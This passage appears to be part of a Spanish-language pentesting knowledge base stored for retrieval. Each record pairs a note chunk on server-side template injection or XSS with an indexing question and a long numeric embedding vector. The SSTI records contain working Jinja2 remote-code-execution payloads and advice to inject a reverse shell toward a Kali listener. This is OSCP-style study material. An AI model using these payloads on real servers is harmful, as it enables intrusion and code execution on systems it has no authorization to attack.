-0.0229, -0.03408, -0.0064, 0.04949, -0.03827, 0.02775, -0.02724, 0.03031, 0.00595, 0.002, 0.05268, 0.0458, 0.02841, 0.04554, -0.03575, -0.00029, -0.07175, 0.00615, -0.04734, -0.02179, -0.06543, -0.07292, -0.02016, -0.01119, -0.10668, 0.06692, 0.03041, -0.02561, 0.01302, -0.02512, 0.03989, -0.00458, 0.00547, 0.05137, -0.0072, -0.02531, -0.03942, 0.01832, 0.06458, 0.04033, 0.01995, -0.07705, -0.01714, 0.03761, -0.03192, -0.00222, 0.06749, 0.02673, 0.01928, -0.00364, 0.03322, -0.08663, 0.02079, -0.00046, 0.00255, 0.06792, 0.03469, 0.02997, 0.01331, -0.0488, -0.0619, 0.04292, 0.06773, -0.00824, -0.06924, -0.01176, -0.00489, -0.07909, -0.00858, 0.02818, -0.02, -0.031, 0.03019, 0.04045, -0.03137, 0.01698, -0.00498]} -{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## DetecciΓ³n\n```\n{{7*7}} β†’ si responde 49 β†’ vulnerable (Jinja2/Twig)\n${7*7} β†’ Freemarker / otros\n<%= 7*7 %> β†’ ERB (Ruby)\n#{7*7} β†’ Ruby/otros\n```\nSi `{{7*7}}` devuelve `49` (no el literal), hay SSTI.", "indexar": "cΓ³mo detecto si un servidor estΓ‘ vulnerable a SSTI mediante pruebas aritmΓ©ticas", "v": [-0.09329, -0.03653, -0.31102, -0.20244, 0.03875, -0.08665, -0.10117, -0.15713, 0.0847, -0.00076, -0.09745, 0.09318, -0.04566, -0.10234, 0.14549, 0.07175, 0.14344, -0.09538, -0.05947, 0.00067, -0.00804, -0.09406, 0.07685, 0.00091, 0.0515, 0.11615, -0.00602, 0.009, 0.03967, -0.01021, -0.07714, 0.00751, 0.02559, -0.02496, -0.05315, -0.05367, -0.12007, -0.03033, 0.02041, 0.20908, 0.10326, -0.10061, 0.03681, -0.03053, 0.02015, -0.0543, -0.02705, -0.03529, 0.06887, 0.02351, -0.10141, 0.05576, -0.13958, -0.01439, -0.07281, 0.03959, 0.00408, -0.08426, 0.06191, -0.07177, -0.06146, -0.03618, 0.01176, -0.01979, 0.08675, -0.05214, 0.0632, 0.03414, -0.14975, -0.07184, -0.00371, -0.02101, -0.02574, -0.05084, 0.0009, -0.00282, 0.03704, 0.02052, 0.06324, -0.06129, 0.00623, 0.04295, 0.03453, 0.12703, -0.13791, -0.10948, -0.01174, -0.0151, 0.02041, -0.04861, 0.09435, 0.00677, -0.05888, 0.05416, 0.03902, -0.00528, 0.11641, -0.10268, 0.03747, -0.00972, 0.07077, -0.02629, -0.03028, 0.08232, 0.01247, 0.03656, 0.01477, 0.01181, 0.01519, -0.08069, 0.01293, -0.03407, -0.09324, -0.06293, -0.06767, -0.00531, 0.04165, -0.02432, 0.01483, 0.0053, -0.10218, -0.06564, -0.05807, 0.01534, -0.01157, -0.0869, 0.04228, -0.03228, 0.01871, 0.01296, -0.03256, 0.02947, -0.08574, -0.00742, 0.00882, 0.00834, 0.05844, -0.11512, -0.08502, -0.02764, 0.03128, -0.01502, 0.04825, 0.01218, 0.04428, -0.02024, -0.00421, -0.01033, -0.10802, 0.03448, -0.02204, -0.01831, -0.06833, 0.06391, -0.1168, -0.03501, 0.06795, -0.0676, -0.0404, -0.01669, -0.04762, 0.00069, -0.01333, 0.06676, 0.07725, 0.04379, 0.02258, 0.00469, 0.02918, 0.00728, -0.02542, 0.02798, 0.0019, 0.03562, 0.01589, -0.01255, -0.0509, -0.0565, -0.00725, -0.05063, -0.07864, 0.00604, -0.01812, -0.02821, 0.01275, -0.03005, 0.03893, -0.00474, 0.04897, 0.04329, 0.03111, 0.02124, -0.02031, 0.11447, 0.05695, -0.03884, -0.01089, -0.04809, -0.04503, -0.03102, -0.11359, -0.05772, -0.0676, -0.01846, -0.03679, 0.00538, 0.01041, -0.00124, 0.01587, 0.01219, 0.0355, -0.08224, 0.12818, -0.07009, -0.06418, -0.00045, 0.0328, -0.04184, -0.01582, 0.03851, -0.03872, 0.00771, 0.03584, 0.04034, -0.01097, 0.01577, -0.00636, 0.05747, 0.09473, -0.00319, 0.01533, 0.02258, -0.04033, -0.00311, 0.0404, -0.00218, -0.00959, -0.01086, -0.03808, -0.06897, 0.00784, 0.08833, -0.0087, -0.0623, -0.00387, -0.04462, -0.00477, -0.08366, -0.02851, -0.02688, 0.00873, -0.04597, 0.06911, -0.09026, 0.03926, -0.0464]} -{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Identificar el motor\nUsa el Γ‘rbol de polyglots de PayloadsAllTheThings (Recursos pΓΊblicos) o **tplmap** para automatizar.", "indexar": "cual es una alternativa libre a tplmap?", "v": [-0.00974, 0.07327, -0.10594, 0.01545, -0.0767, -0.02539, 0.07899, -0.02253, -0.11572, 0.06746, -0.04825, -0.08145, 0.12544, 0.10415, 0.01191, -0.00496, -0.01875, -0.13721, 0.22079, -0.04557, -0.08861, -0.01908, -0.20258, -0.1513, -0.07667, -0.03733, -0.02874, -0.03933, -0.15534, -0.04124, 0.0184, -0.01719, -0.01631, -0.05414, 0.00795, 0.01795, 0.20813, 0.09774, 0.02867, -0.08301, -0.07572, -0.11444, -0.03996, 0.11928, -0.01204, -0.04617, -0.08652, 0.09225, -0.02532, -0.01025, -0.12426, 0.07458, -0.08072, -0.00277, 0.10353, -0.01648, 0.13808, -0.11748, 0.00061, -0.01291, -0.05555, 0.06024, -0.01114, -0.10169, 0.02264, 0.00263, -0.04745, 0.01748, -0.06392, 0.08465, 0.02622, 0.00676, 0.05925, -0.01613, -0.07686, 0.051, -0.09119, -0.03463, 0.02968, 0.04351, 0.08484, -0.09163, -0.06053, 0.02602, -0.03958, -0.1038, 0.06786, -0.03055, -0.00168, -0.00874, 0.0496, 0.07418, -0.01718, 0.13809, -0.03702, -0.13137, 0.00538, 0.09167, 0.01823, 0.07414, 0.10064, 0.05377, -0.14337, -0.00963, 0.03812, -0.02133, 0.02727, 0.01133, -0.08286, 0.03957, 0.01809, 0.07931, -0.00655, 0.02155, 0.01929, -0.07737, -0.06178, 0.03694, 0.02229, -0.03198, -0.04477, -0.06147, -0.0367, -0.08969, 0.03492, 0.0664, 0.01676, 0.05109, -0.05468, 0.09968, 0.06977, 0.01821, -0.06203, -0.1009, -0.09145, -0.04772, 0.05346, -0.02201, 0.02069, 0.02012, 0.00518, 0.00535, 0.03135, -0.04038, 0.00985, -0.0471, 0.00578, -0.11138, -0.03719, 0.01, -0.10892, 0.03982, 0.01281, 0.11918, -0.01808, 0.03745, -0.0492, -0.02903, -0.0693, 0.11415, 0.0014, -0.01638, 0.00927, 0.09016, -0.01226, -0.04412, 0.01885, -0.04995, -0.03335, -0.01805, 0.02847, 0.0849, 0.06688, -0.04424, 0.07241, -0.10711, -0.02214, -0.11184, 0.05201, -0.01093, -0.02184, 0.05214, -0.04525, 0.0071, -0.02021, -0.03659, -0.01941, -0.00643, 0.04237, -0.00164, -0.04118, 0.03462, -0.06161, -0.09634, -0.06031, -0.0256, 0.03718, -0.06477, -0.0046, -0.05974, -0.07187, -0.03681, -0.01792, -0.02612, -0.0395, 0.00106, -0.01188, 0.09703, 0.01179, 0.04195, 0.05393, 0.008, 0.08293, -0.00633, -0.03631, -0.00632, 0.02188, -0.01274, 0.00634, -0.03621, 0.06018, 0.03984, -0.00415, 0.00986, -0.00591, 0.01173, 0.05496, 0.0519, -0.01582, 0.01381, -0.02083, 0.01759, 0.0361, 0.01126, 0.04229, 0.01507, 0.00661, 0.03207, 0.01372, -0.07921, 0.05668, 0.07371, -0.06319, -0.03071, -0.00797, -0.02023, -0.07608, -0.00291, -0.01887, -0.05792, -0.01217, 0.04498, 0.06041, -0.00938, 0.03368, 0.00277]} -{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Identificar el motor\nUsa el Γ‘rbol de polyglots de PayloadsAllTheThings (Recursos pΓΊblicos) o **tplmap** para automatizar.", "indexar": "con que puedo montar un ataque de fuerza bruta en el Γ‘rbol de polyglots?", "v": [-0.01784, -0.07737, -0.18533, -0.06399, -0.25169, 0.13904, 0.11723, 0.05978, -0.1123, -0.11728, -0.06099, 0.06704, -0.0294, 0.15775, 0.01754, -0.14074, -0.0201, -0.06331, -0.11273, -0.03852, -0.06202, -0.06559, 0.00141, -0.13026, -0.00603, -0.01103, -0.0491, 0.14571, -0.09097, 0.03419, -0.01159, 0.09149, 0.08824, -0.10657, -0.00397, -0.06158, -0.01675, 0.10255, 0.09362, 0.01472, -0.15328, -0.06757, -0.11371, 0.00558, -0.07372, 0.01447, -0.03139, -0.01426, -0.03779, 0.06765, -0.05753, 0.00066, -0.12399, -0.14197, -0.10501, -0.132, 0.01565, -0.04301, 0.02343, 0.04546, -0.07988, 0.10237, -0.08719, -0.10012, -3e-05, -0.01218, -0.03904, 0.05869, -0.01998, -0.07442, -0.08683, -0.15245, -0.02091, -0.03409, -0.00283, 0.05995, 0.00929, -0.00751, -0.03498, 0.08415, -0.04516, -0.05452, -0.10773, -0.02197, -0.05231, 0.04494, 0.06569, -0.11546, -0.02708, -0.04281, -0.02078, -0.00533, -0.02455, 0.00366, -0.05565, 0.00427, -0.09115, 0.04391, 0.00098, -0.05179, -0.03652, -0.04547, 0.0122, -0.00247, 0.11584, -0.00837, -0.1021, 0.02834, 0.02065, 0.02334, -0.00069, -0.01825, -0.0514, 0.0462, -0.03531, -0.06649, -0.10051, -0.08139, -0.04241, 0.03191, -0.04481, 0.08252, 0.01393, 0.09613, -0.04642, 0.01876, 0.05813, 0.08826, -0.04778, -0.05964, -0.03066, 0.01006, -0.01183, -0.05882, -0.06375, -0.00966, 0.00068, -0.11405, -0.04311, 0.0308, 0.01662, 0.04864, -0.05467, -0.00023, 0.00313, 0.08548, -0.05141, 0.0036, -0.06692, 0.01639, 0.08808, 0.05587, 0.07202, 0.08567, -0.02087, -0.05283, 0.01048, -0.0074, 0.0617, 0.06012, -0.02053, -0.0268, -0.09823, 0.0568, 0.00895, 0.00404, -0.06403, -0.06299, 0.10217, -0.00435, -0.05818, -0.02526, 0.05111, 0.08633, 0.0051, -0.05493, -0.02339, 0.0427, 0.00889, 0.08719, -0.04251, -0.01637, -0.05833, -0.0162, -0.02325, 0.02287, 0.06437, 0.02192, 0.02175, -0.00795, -0.02052, 0.08165, -0.03793, 0.02898, 0.00976, -0.07298, -0.01836, 0.05918, -0.00023, -0.01946, 0.00818, -0.0189, -0.03269, -0.02292, 0.09387, 0.00108, 0.02212, -0.00023, -0.01041, 0.07276, 0.04459, 0.00118, 0.08618, -0.01915, -0.01502, -0.04167, -0.00621, 0.01046, -0.0245, 0.04163, -0.01128, 0.068, 0.04902, 0.05377, -0.00934, 0.01158, -0.01461, -0.02869, 0.04637, 0.07196, -0.0968, -0.06222, 0.02811, 0.01207, -0.01234, -0.04094, 0.04508, 0.04329, -0.11185, 0.02327, 0.01487, 0.00813, -0.0099, -0.02062, -0.06624, -0.03129, -0.0633, 0.04482, -0.0283, -0.03479, -0.00707, 0.0124, -0.008, -0.03906, -0.02563, -0.0714]} -{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Jinja2 (Python) β†’ RCE\n```python\n{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}\n{{ cycler.__init__.__globals__.os.popen('id').read() }}\n```", "indexar": "que tΓ©cnica de explotaciΓ³n se usa para obtener shell con Jinja2 en Python?", "v": [-0.08642, -0.16879, -0.07575, -0.21729, 0.01743, -0.16947, -0.15472, -0.01668, 0.02172, 0.09882, 0.03516, 0.09719, 0.03596, 0.0738, -0.06872, -0.11757, -0.10617, -0.13523, 0.07626, -0.02846, -0.17665, 0.14276, -0.01885, -0.0771, -0.04716, 0.14946, -0.00106, -0.05883, -0.07768, 0.07766, 0.08858, 0.0482, 0.06983, 0.02384, -0.07052, 0.03902, 0.0566, 0.01634, -0.00193, 0.03241, -0.10023, -0.13348, -0.1149, 0.04446, -0.02915, 0.05393, 0.09743, 0.04896, -0.08891, 0.09178, -0.05055, -0.04586, -0.13151, -0.03214, 0.13508, -0.10962, 0.03136, -0.01698, -0.01875, 0.00183, -0.0405, -0.07214, -0.00535, -0.0143, 0.03886, -0.02304, 0.06135, -0.0238, -0.0337, 0.06345, 0.03562, 0.07099, -0.02802, 0.00667, 0.02098, -0.01658, -0.12622, 0.06583, 0.01262, -0.02032, -0.11146, -0.09159, -0.02961, 0.07133, -0.03531, -0.1685, 0.07355, -0.02695, 0.02686, -0.12629, 0.06705, 0.03179, 0.04315, -0.02865, 0.07294, 0.00624, 0.02331, 0.02915, 0.00469, 0.0508, 0.02034, -0.00997, 0.02285, 0.07102, 0.054, 0.07024, 0.0527, -0.00576, -0.04495, -0.00197, 0.05198, 0.00381, -0.07348, 0.02394, -0.13653, -0.09596, -0.10331, -0.02243, -0.06547, 0.05751, -0.00823, 0.01959, -0.06607, 0.11783, -0.02338, -0.05482, -0.05026, 0.08021, 0.03822, -0.06575, -0.02879, -0.04287, -0.04676, 0.06266, -0.03428, 0.0637, 0.11392, -0.02964, -0.03848, -0.06999, -0.06204, 0.05472, -0.04701, 0.03269, 0.05306, 0.00098, 0.0472, -0.0719, -0.06318, -0.09076, 0.06059, -0.08479, -0.0234, 0.06616, -0.03035, -0.06557, -0.06317, 0.02529, 0.01698, -0.01782, 0.03082, -0.0784, -0.05234, -0.02778, -0.0072, 0.01312, -0.06215, -0.11799, -0.03114, 0.00945, -0.05586, -0.01051, 0.04009, 0.0284, -0.0232, -0.05165, 0.014, 0.00479, 0.04249, -0.03991, 0.00714, -0.00658, -0.03541, -0.07298, 0.03215, 0.00108, -0.00305, -0.01779, -0.02858, 0.00847, 0.07103, 0.07148, 0.06964, -0.02141, -0.04652, -0.03595, -0.01077, 0.04414, 0.03532, -0.01166, 0.00274, 0.02899, -0.04841, 0.00303, 0.033, 0.03972, -0.04218, -0.08558, -0.05236, -0.04564, 0.02134, -0.00768, 0.0549, -0.04777, 0.02674, -0.0069, -0.0038, 0.07021, 0.04168, 0.02442, -0.10433, 0.04309, 0.01752, 0.0199, -0.00861, -0.05258, 0.04481, 0.03666, 0.00133, 0.04346, -0.11651, 0.03457, -0.02474, -0.00947, -0.00287, 0.0035, 0.02023, -0.04869, -0.04438, -0.01716, -0.02134, 0.0707, 0.00226, -0.01518, -0.00961, -0.02036, -0.10014, 0.03215, 0.00998, -0.03471, -0.04477, 0.00181, 0.00796, -0.04473, 0.00555, -0.03088]} -{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Jinja2 (Python) β†’ RCE\n```python\n{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}\n{{ cycler.__init__.__globals__.os.popen('id').read() }}\n```", "indexar": "cΓ³mo puedo realizar un Remote Code Execution (RCE) usando el mΓ³dulo os en Jinja2?", "v": [-0.23306, -0.03842, -0.11551, -0.12897, 0.08855, -0.01797, -0.07447, 0.08716, -0.05764, -0.0357, -0.14854, -0.11287, 0.10203, -0.02326, 0.07943, -0.03826, 0.06616, 0.05333, -0.19352, -0.03568, -0.02912, -0.11382, -0.01178, 0.07141, 0.06349, 0.22886, 0.03274, 0.05691, -0.00233, -0.08805, 0.17084, -0.01597, 0.07106, -0.01121, -0.00937, -0.03666, 0.0694, 0.06444, -0.11909, 0.03873, -0.0291, 0.04838, -0.16171, -0.01814, 0.0299, 0.08945, 0.1403, 0.01917, 0.02441, 0.06045, -0.09222, -0.04628, -0.12749, 0.00494, 0.11931, -0.12363, 0.13377, -0.10823, -0.01125, -0.09219, 0.14866, 0.00134, 0.03811, -0.02406, 0.05382, -0.01837, 0.1098, 0.01869, -0.08245, 0.03275, -0.07029, 0.07524, -0.08245, -0.10548, 0.01596, -0.07687, -0.06573, 0.01312, 0.09402, -0.00729, -0.01753, 0.05227, -0.05104, 0.00699, -0.04508, 0.08717, 0.03047, -0.10697, -0.01542, -0.09887, 0.03474, -0.02679, 0.04718, -0.00188, 0.08262, -0.05592, 0.02528, 0.06858, 0.02845, 0.00614, 0.01107, 0.08033, 0.00399, 0.11059, 0.04572, 0.00565, 0.10294, 0.07298, 0.00768, -0.09761, -0.09033, 0.03656, -0.10461, 0.0025, -0.13292, -0.06983, -0.00988, 0.0286, -0.01306, -0.01911, -0.05902, -0.04304, -0.08238, 0.00078, 0.0748, -0.01126, -0.01955, 0.0321, 0.00553, -0.08512, -0.07282, -0.03316, 0.07633, -0.04011, -0.0509, 0.08872, 0.08854, -0.03715, -0.05455, -0.03284, 0.03326, -0.0056, 0.11211, 0.04269, 0.10626, 0.02521, 0.02986, -0.01408, 0.02913, 0.03181, 0.04131, 0.02322, -0.05686, 0.04688, -0.04674, -0.0737, -0.01869, -0.07112, -0.03612, 0.0479, -0.07655, -0.00196, -0.00304, -0.01252, 0.05371, -0.02022, -0.0577, -0.0478, 0.00069, 0.0259, -0.0303, 0.06467, 0.04573, -0.02133, 0.02202, -0.01281, 0.09446, -0.0237, -0.00425, -0.00469, -0.01429, 0.05976, 0.03641, -0.00938, 0.06172, 0.00571, -0.00407, -0.03445, -0.02364, 0.0289, 0.01146, 0.03399, 0.01054, -0.03626, -0.01641, -0.02525, -0.02334, -0.0747, 0.0248, 0.00252, -0.03952, 0.00282, 0.00857, -0.04495, 0.0414, -0.0015, -0.04137, 0.01581, -0.00531, 0.05033, 0.02178, -0.00645, 0.05014, -0.01856, -0.00755, 0.02278, -0.05977, 0.06391, 0.04188, -0.00517, -0.08098, 0.00915, 0.02355, -0.00733, 0.01055, 0.06014, 0.01301, 0.02894, -0.00365, -0.01921, 0.00521, 0.00326, 0.0325, -0.00075, 0.03979, -0.00157, 0.04854, -0.01584, -0.02003, -0.01337, 0.04066, 0.02781, 0.00162, 0.0074, -0.02019, -0.04607, -0.06799, -0.01059, -0.00818, -0.06257, -0.06731, -0.03569, 0.02013, 0.01814, -0.04865, -0.00902]} -{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## De RCE a shell\nInyecta el comando de Reverse shell dentro del payload β†’ listener en Kali.\n\nRelacionado: Command injection Β· XSS Β· OSCP MOC", "indexar": "con que puedo inyectar un reverse shell hacia un listener?", "v": [0.14965, 0.10072, -0.07317, 0.10365, -0.00147, -0.04019, -0.1912, 0.01681, 0.08381, -0.03355, -0.06419, -0.00519, 0.07414, -0.03637, 0.04417, 0.07009, -0.09804, 0.00602, -0.02063, -0.08219, -0.02162, 0.03986, -0.0324, -0.08231, -0.03045, 0.13926, 0.07977, 0.09813, -0.0181, -0.0756, -0.16195, -0.10677, 0.0264, 0.0273, -0.01017, 0.04111, 0.03181, 0.07175, 0.04357, 0.14422, -0.00918, 0.01095, -0.07299, 0.10098, -0.00774, 0.01965, -0.01248, 0.01811, 0.07404, 0.02995, -0.12923, -0.06711, -0.18635, 0.09446, 0.04794, -0.01621, 0.09972, -0.11169, 0.10335, -0.12765, -0.17223, 0.0539, 0.02086, 0.01419, 0.04913, -0.00874, -0.04368, -0.02894, -0.01531, -0.10875, -0.09634, 0.04924, 0.04054, 0.01116, -0.05296, 0.00699, 0.04624, 0.02476, 0.0033, -0.01833, -0.07771, -0.09745, -0.05059, 0.04375, 0.07249, 0.09318, 0.1235, -0.06519, -0.0007, 0.02375, 0.04577, 0.03734, -0.02598, 0.04431, -0.01925, -0.08275, -0.01546, 0.02504, -0.16858, -0.05206, 0.0521, -0.00347, 0.01918, 0.16286, 0.11787, 0.11061, -0.07216, -0.1341, 0.04553, 0.04573, -0.02088, 0.01788, -0.01399, -0.01796, 0.01541, -0.07782, -0.09964, 0.00988, 0.05622, -0.00029, 0.03823, -0.0176, -0.04697, -0.02418, 0.02735, 0.05393, -0.05786, 0.03249, 0.0312, -0.0138, 0.04616, 0.03529, 0.03907, -0.05638, -0.00526, 0.0713, -0.02274, -0.01723, 0.02277, 0.11165, 0.01706, 0.11221, 0.03687, 0.0474, 0.04789, -0.10118, 0.07627, -0.1074, -0.07758, -0.10952, -0.0177, 0.07883, 0.00811, 0.05743, -0.05424, -0.04931, 0.07523, -0.07851, 0.09091, -0.00485, -0.05946, 0.08099, 0.01425, 0.02869, 0.00731, -0.01211, -0.10373, -0.02711, 0.0253, -0.03671, -0.07272, -0.05636, 0.11614, -0.00695, -0.01649, -0.00642, -0.00801, 0.03938, 0.08477, -0.04188, -0.00107, 0.0017, -0.04671, -0.04016, 0.00474, 0.00705, -0.00902, 0.04009, 0.01391, 0.03357, 0.02785, 0.05296, -0.0226, -0.02464, 0.05696, 0.00845, 0.03642, -0.03257, -0.05416, 0.03634, -0.04072, 0.05458, 0.03283, -0.08473, 0.01255, -0.01021, -0.0985, 0.06485, 0.01218, -0.00734, 0.02198, -0.02808, 0.05656, 0.09908, -0.04201, 0.00509, 0.02947, 0.00278, -0.0553, 0.07465, -0.0015, 0.0851, 0.05986, 0.02, -0.02643, -0.0337, 0.05392, -0.0198, 0.05655, 0.05341, -0.02767, 0.05816, 0.01493, 0.02104, -0.04749, 0.07236, -0.02185, -0.04076, -0.00237, -0.02641, 0.04689, 0.03916, 0.01316, -0.02502, 0.04185, -0.03549, -0.02418, 0.02166, -0.03237, -0.02458, -0.01976, 0.02713, 0.03628, -0.034, 0.08451, -0.06339]} -{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## De RCE a shell\nInyecta el comando de Reverse shell dentro del payload β†’ listener en Kali.\n\nRelacionado: Command injection Β· XSS Β· OSCP MOC", "indexar": "que herramienta sirve para montar un listener desde kali linux?", "v": [0.0856, 0.02012, -0.14596, -0.16691, -0.07748, -0.17608, -0.24821, 0.05589, -0.06245, -0.08031, -0.01623, -0.09123, 0.11959, -0.07305, 0.08698, 0.02733, -0.02376, -0.15379, -0.01291, -0.04709, -0.0647, 0.15026, -0.06247, -0.07705, -0.02138, 0.08936, 0.15097, -0.19059, -0.10975, 0.10816, -0.05007, 0.05517, -0.01848, 0.05577, -0.0461, -0.08795, -0.01086, 0.04473, 0.06076, 0.13417, 0.05502, 0.04655, 0.01038, 0.03829, -0.10188, -0.04031, 0.02209, -0.00188, 0.10964, 0.11705, 0.0382, -0.0265, -0.11461, 0.0398, 0.03854, -0.0771, 0.16429, -0.18727, 0.09851, -0.13354, -0.15194, -0.01672, -0.07647, -0.05608, 0.02014, 0.00565, -0.02187, -0.03053, -0.07221, -0.0066, -0.09478, 0.03924, 0.04574, -0.0065, -0.02347, 0.00815, 0.01693, 0.05252, 0.08658, -0.01517, 0.08542, -0.06059, -0.01158, 0.04273, -0.08138, -0.00211, 0.14663, -0.01632, -0.04174, 0.05488, -0.00699, 0.14732, -0.02106, 0.04284, 0.11721, -0.04284, 0.08255, 0.04624, 0.00483, -0.0879, 0.09865, -0.02242, -0.05046, 0.11369, 0.07832, 0.01514, 0.02351, -0.10112, -0.01251, -0.03315, 0.06887, 0.01765, -0.00934, -0.00047, -0.06647, -0.06045, -0.00838, 0.00732, -0.03029, -0.01073, 0.03783, 0.06545, -0.03989, -0.01383, 0.00245, -0.01461, 0.01769, 0.06969, 0.00695, -0.0877, 0.0362, -0.05592, -0.00777, 0.02489, -0.03507, -0.03857, 0.01056, -0.13139, -0.04132, 0.03881, 0.06311, 0.05869, -0.03627, -0.05112, 0.05807, -0.00029, 0.05716, -0.05798, 0.01148, -0.04887, 0.0253, 0.02876, 0.00557, -0.01041, -0.08548, -0.05151, 0.01035, 0.00413, -0.0141, 0.03252, -0.02932, -0.02375, 0.06695, -0.00773, 0.02455, -0.00887, -0.03285, 0.04944, 0.09305, 0.03572, 0.00656, 0.01506, 0.14062, -0.06797, 0.0131, -0.07432, -0.02879, -0.00407, 0.01856, -0.03555, -0.05391, 0.00476, -0.03924, -0.0118, 0.04392, 0.00835, 0.03304, -0.01964, -0.01816, 0.01624, -0.00269, -0.00501, -0.02793, -0.03485, 0.07211, 0.01903, -0.01862, -0.04945, -0.03262, 0.04563, -0.05352, 0.01221, -0.0092, -0.03898, 0.0452, 0.00184, -0.02312, -0.01647, 0.02873, 0.05807, 0.03273, 0.01731, -0.01153, 0.02692, 0.00704, -0.02744, 0.00636, 0.02778, -0.01072, 0.04336, -0.02364, 0.01012, 0.0687, 0.0074, -0.05807, 0.01064, -0.00536, -0.01425, 0.02694, -0.0201, 0.01598, 0.00732, 0.02641, 0.00756, -0.0284, -0.01479, 0.0537, 0.01496, -0.01368, -0.02594, -0.01038, 0.02852, 0.03041, -0.03973, -0.04178, -0.05856, 0.02582, -0.01355, -0.03306, -0.06414, -0.04209, -0.00692, 0.02785, -0.03818, -0.00737, -0.02081]} -{"tipo": "pregunta", "herramienta": "XSS", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/XSS.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# XSS (Cross-Site Scripting)\n\n> Inyectas JavaScript que se ejecuta en el navegador de otro usuario. En OSCP pesa menos que SQLi/RCE, pero aparece (sobre todo para robar sesiΓ³n de un admin). Vector de Hacking web.", "indexar": "que tecnica sirve para inyectar javascript en la web", "v": [-0.02623, -0.00802, -0.17738, -0.09071, 0.1328, -0.18284, -0.0826, -0.0407, 0.1439, -0.02975, -0.0697, -0.08655, 0.03524, -0.01683, 0.03842, 0.05015, 0.10683, -0.16822, 0.19735, -0.08142, -0.06023, -0.0011, -0.05542, -0.10602, -0.13872, -0.01899, -0.05683, -0.09044, -0.21611, 0.00228, -0.05041, -0.00205, 0.03842, 0.03764, -0.01768, 0.00643, 0.11944, 0.00974, -0.03596, 0.05061, -0.12403, -0.10798, -0.12045, 0.02645, -0.02485, 0.0957, 0.11814, -0.03973, 0.0346, -0.01938, -0.06096, 0.02252, -0.07436, 0.03347, -0.10988, 0.01128, -0.00116, -0.07944, -0.05132, -0.07764, -0.06187, -0.06699, -0.01969, -0.02682, 0.05572, -0.08599, -0.03622, -0.01667, 0.06964, -0.13907, -0.06831, 0.08918, -0.02017, -0.05147, -0.01932, 0.01205, -0.11482, 0.06343, 0.06748, -0.08854, 0.00731, 0.03365, -0.11398, 0.04051, 0.03009, 0.02013, 0.12973, -0.04122, 0.08801, -0.14341, 0.10158, 0.04546, -0.00099, -0.04904, 0.00183, -0.03267, 0.02748, 0.03812, 0.093, -0.10937, 0.02276, -0.07916, -0.06637, -0.02648, 0.09574, 0.13738, 0.07156, -0.07439, -0.08746, -0.0599, 0.01133, 0.07362, -0.14128, -0.00718, 0.01089, -0.00778, -0.03741, -0.00843, -0.05538, -0.04331, -0.02484, 0.01749, -0.05153, -0.00997, -0.04125, 0.07125, -0.04794, -0.01459, -0.01971, -0.01786, -0.02305, -0.07893, -0.09557, 0.03015, 0.03112, 0.10017, 0.07363, -0.07815, -0.10706, 0.07038, 0.0048, 0.05525, -0.05059, 0.00823, -0.00759, -0.04005, 0.10987, -0.03879, -0.0699, -0.09499, 0.00958, -0.01156, 0.03304, 0.10031, -0.04004, -0.04945, -0.01329, -0.02531, -0.01899, 0.0768, -0.03537, 0.06385, 0.03238, 0.04483, -0.04594, 0.04495, -0.12554, -0.00658, 0.03466, 0.0607, 0.01061, -0.00037, -0.01583, -0.02768, 0.00054, 0.01787, -0.06995, 0.00668, 0.01308, -0.06319, -0.00181, -0.05642, 0.03005, 0.03168, 0.01151, 0.0055, 0.01738, -0.01262, -0.0411, 0.00045, -0.02939, -0.03181, -0.07779, 0.01397, 0.04657, -0.00197, -0.0476, -0.0041, 0.04254, -0.00462, 0.00327, -0.00094, 0.00455, -0.03686, -0.01982, 0.00038, 0.05037, -0.05588, -0.01069, -0.01006, -0.01774, -0.04088, 0.04847, -0.06086, 0.01847, -0.04323, 0.12455, -0.01637, -0.02552, 0.00966, 0.01763, -0.02703, -0.01488, -0.02079, 0.03299, 0.01094, 0.02666, -0.00187, 0.03901, 0.03315, -0.02489, -0.02346, -0.02746, -0.00207, 0.01784, 0.01387, 0.00715, -0.02206, -0.06706, -0.04011, 0.00725, 0.00489, -0.00415, 0.0021, 0.01484, -0.07236, -0.08226, -0.02532, 0.02242, -0.00545, -0.04395, -0.03594, 0.01762, 0.01381, 0.03019, -0.00727]} -{"tipo": "pregunta", "herramienta": "XSS", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/XSS.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# XSS (Cross-Site Scripting)\n\n> Inyectas JavaScript que se ejecuta en el navegador de otro usuario. En OSCP pesa menos que SQLi/RCE, pero aparece (sobre todo para robar sesiΓ³n de un admin). Vector de Hacking web.", "indexar": "como montarias un ataque tipo cross-site scripting", "v": [0.06548, -0.01631, -0.1545, -0.0768, -0.10045, -0.14677, -0.0556, 0.00077, 0.02218, -0.00693, 0.00819, -0.09216, 0.04892, -0.05147, 0.16033, -0.08311, 0.06048, 0.05502, 0.09368, -0.04597, -0.02487, -0.1072, 0.01954, -0.04159, -0.07697, -0.04152, -0.06425, 0.05812, -0.11376, -0.06987, -0.04166, 